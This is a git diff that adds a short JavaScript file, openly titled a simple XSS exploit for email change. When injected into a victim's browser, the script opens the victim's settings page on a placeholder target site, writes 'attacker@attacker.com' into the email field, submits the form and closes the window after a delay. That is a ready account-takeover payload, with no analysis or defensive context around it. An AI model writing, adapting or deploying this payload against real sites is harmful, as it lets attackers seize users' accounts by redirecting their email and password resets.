diff --git a/email_change_exploit_xss.js b/email_change_exploit_xss.js
new file mode 100644
index 0000000..3d5c7d3
--- /dev/null
+++ b/email_change_exploit_xss.js
@@ -0,0 +1,15 @@
+// a Simple XSS exploit for email change 
+// R0K
+
+var dark_window = window.open('https://www.target.com/settings');
+dark_window.addEventListener('load', 
+
+	function exploit_run(){
+		dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email
+		dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
+
+		setTimeout(function() { // just for delay and closing
+			dark_window.close();
+		}, 10000);
+
+	}, true);